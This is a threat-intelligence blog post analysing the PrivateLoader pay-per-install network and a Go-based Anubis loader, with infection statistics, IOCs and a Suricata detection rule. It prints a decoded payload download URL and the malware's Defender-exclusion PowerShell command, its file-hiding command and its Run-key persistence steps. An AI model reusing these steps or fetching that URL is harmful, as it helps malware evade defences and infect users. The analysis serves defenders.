1/17 Jason Reaves February 14, 2022 PrivateLoader to Anubis Loader medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Jason Reaves Feb 14 · 6 min read By: Jason Reaves and Joshua Platt Intel471 released a report[1] on a loader system being leveraged for distribution of various crimeware malware families: Qbot SmokeLoader TrickBot https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e https://medium.com/@jason.reaves?source=post_page-----55d066a2653e-------------------------------- https://medium.com/@jason.reaves?source=post_page-----55d066a2653e-------------------------------- 2/17 NanoCore RAT Redline stealer njRat Djvu ransomware Vidar stealer Remcos RAT Tofsee spambot QRat Lockbit ransomware Dridex DanaBot The diversity of the malware families led the Walmart Cyber Intel team to investigate further. Infrastructure Analysis The report mentioned an administrator panel located on the main command and control server. The panel is named “EZCubePanel” by the author. The configuration options are fairly straightforward as laid out in the intel471 offering. The panel is configured to deliver links and browser extensions. Links The browser extensions did appear to be suspended at the time but were likely utilized in previous campaigns. 3/17 Extensions While the AdminLTE open source bootstrap template has been implemented to streamline the UI process, the main functionality is implemented in php. Curiously, two geo tags appear to be linked to specific domains. The tag WW_5 is hard coded for ezsoftware[.]ru, while the tag WW_8 is linked to vip-space[.]com & vip-files[.]com Domains Installer The private loader installer makes some interesting requests. 4/17 941c7e39e8ea114465eadbd45aa709d55ad36ba551cbbf552e4c09b494a3a32d After downloading a proxy list and contacting statistics.php, the payload link is encrypted with a simple xor routine and delivered to the client. >>> for i in range(len(b)):... b[i] ^= 0x1d...>>> bbytearray(b'URL:https://cdn.discordapp. com/attachments/910842184708792331/931520130133930034/PL_Client.mp') Database Infection counts show a large loader based system, which mimics some of the data presented in the report by Intel471. Extension infection stats: Logger infection stats from deliveries: Loaders Loading Loaders 5/17 According to the report, “Privacy tools” domains were utilized as a primary delivery for SmokeLoader. After checking out a few of the domains, some interesting stats were discovered. In November of 2021, over a period of 20 days there were over 125K loads. For December 2021, roughly 82K for pab2 and pab3. 6/17 Stats The stat panel below appeared to show loads for the affiliate IDs pub1, pub2 and pub3. Nearly 33K loads in nine days. 7/17 Current Stats During our investigation we found other loaders delivered by PrivateLoader. Similar to what the report stated. However, during some of the loader executions, we observed traffic that did not appear to line up with the other stealers. 8/17 After further inspection of the ‘build_dl’ traffic, one of the uncovered loader samples was actually developed in GoLang. Upon execution, the sample performs a check to see if it has admin privileges by attempting to open \\PHYSICALDRIVE: 9/17 Next it takes a screenshot: And then proceeds to install itself: Some of the strings are obfuscated but the deobfuscation is simply subtracting one from every character: 10/17 def deobf(a): b = bytearray(a) for i in range(len(b)): b[i] -=1 return b So now we can easily map out the install process steps, the malware leverages powershell to setup some exclusion paths: powershell -Command Add-MpPreference -ExclusionPathon: AppData\Local\Temp AppData\Local\Microsoft Sets a runkey in Software\\Microsoft\\Windows\\CurrentVersion\\Run and the registry name and install name will be randomly generated from a hardcoded list of possibilities, install names: svchostcsrssrundll32winlogonsmsstaskhostunsecappAdobeARMwinsysjuschedBCUwscntfyconhost For the registry names: Trion SoftworksMystic EntertainmentMicrosoft PartnersClient-Server Runtime SubsystemNetworking Service After then moving itself to the proper location it will use ‘attrib’ to set itself as a system file and hidden: attrib +S +H Along with altering the HOSTS file: (edited for brevity) 11/17 And flushing the DNS cache: ipconfig //flushdns After installation the bot will connect to the C2 either over HTTP or TCP and register itself by sending various information back to the C2 via TCP: md5(cmd /c whoami) + “->Reg->[“ + Datetime + ”]->” + + “->” + + “->” + + “->” + + “->” +Bot Build + 12/17 Bot registration For HTTP traffic an example can be seen below, the data sent to the server is obfuscated by adding two to every byte: POST /callback HTTP/1.1Host: redacted.x.x.xUser-Agent: Go-http-client/1.1Content- Length: 57Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipcallback=HktgYcnn%22Cffgf%22%2F%22lwuejgf®info=WugtMKV After registration, the bot will check for tasks to perform: 13/17 Task parsing Task Commands Panel The panel refers to itself as ‘ANUBIS PANEL’ and contains roughly 20K bots. The bots appeared to be leveraged for crypto mining and distributing other malware. 14/17 PPI stats By country: 15/17 Country map for installs: Install stat slice from January: 16/17 The stats clearly show Anubis operators have been delivering thousands of installs each week. In the case of Anubis, more than 500 unique binaries were distributed. The delivered tasks from Anubis also appear to similarly overlap with those of PrivateLoader. Over a period of 12 days, more than 11 GB of stealer logs were collected. While cracked software is often overlooked in the world of CyberCrime, it is clearly underestimated as a tactic. IOCs Privacy-tools-for-you-777[.]com2.56.59[.]42212.193.30[.]29212.193.30[.]45privacy- tools-for-you-782[.]comfile-coin-host-12[.]comhost-file-file0[.]comprivacy-tools-for- you-781[.]comcoin-file-file-19[.]comcoin-coin-file-9[.]comfile-file-host8[.]comdata- host-coin-8[.]comfile-file-host4[.]comhost-data-coin-11[.]comAnubis Loader:84b33d3b0c1e396758f9591e797f5b0029be3f6a752dc2bec2dc20a85d68addab7e657155c23d71 TCP traffic suricata rule: alert tcp $HOME_NET any -> $EXTERNAL_NET any ( msg:"Anubis Registration"; content:"|54 67 69 2f 40|"; within:50; content:"|4f6b6574717571687622596b7066717975225d586774756b7170|"; classtype:trojan- activity; sid:9000001; rev:1;) 17/17 References 1: https://intel471.com/blog/privateloader-malware 2: https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute- redline-stealer https://intel471.com/blog/privateloader-malware https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer